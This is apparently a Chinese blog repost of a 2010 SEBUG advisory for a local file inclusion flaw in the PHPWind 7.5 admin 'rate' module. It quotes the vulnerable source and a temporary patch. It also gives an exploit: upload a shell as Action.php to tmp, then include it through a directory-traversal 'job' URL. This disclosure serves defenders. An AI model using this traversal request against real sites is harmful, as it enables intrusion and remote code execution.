Phpwind7.5 后台本地包含漏洞

2010年2月5日星期五 | | |

SSV ID:19065
SEBUG-Appdir:PHPWind
Published:2010-02-05
Vulnerable:
Phpwind7.5
Discription:
文件:hack\rate\admin.php  源码:  <?php  !function_exists('readover') && exit('Forbidden');  define ( "H_R", R_P . "hack/rate/" );  define ( "L_R", R_P . "lib/" );  InitGP ( array ('ajax' ) );  $action = strtolower ( ($job) ? $job : "admin" );  $filepath = H_R . "action/" . $action . "Action.php";    (! file_exists ( $filepath )) && exit ();    if ($job != "ajax") {      require H_R . '/template/layout.php';  } else {      require_once $filepath;  }    ?>    再看看hack\rate\template\layout.php:  <?php  !function_exists('readover') && exit('Forbidden');  include_once PrintEot ( 'left' );  print <<<EOT  -->  EOT;  require_once $filepath;  include_once PrintEot ( 'adminbottom' );  ?>    $job可以自定义,触发本地包含,只不过addslashes了,因此不能通过%00截断;但可以通过若干///////截断,或者直接在tmp文件夹下写个shell来包含。
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
先在tmp下上传一个shell,名为Action.php  然后访问:http://127.0.0.1/pw /admin.php?adminjob=hack&hackset=rate&typeid=100&job=../../../../../../tmp/
SEBUG Solution:
临时补丁:    $filepath = H_R . "action/" . $action . "Action.php";  替换为:  $filepath = Pcv(H_R . "action/" . $action . "Action.php");
// sebug.net [2010-02-05]
谢谢光临本站: http://home.benz.la   共享无限..再次申明 : 此代码含危险性,,请勿从事非法活动.
我的QQ空间
Discuz!7.0-7.2后台settings.inc.php中写shell漏洞
SSV ID:19067SEBUG-Appdir:Discuz!Published:2010-02-05Vulnerab...
 

0 评论:


所有文章收集于网络,如果有牵扯到版权问题请与本站站长联系。谢谢合作![email protected]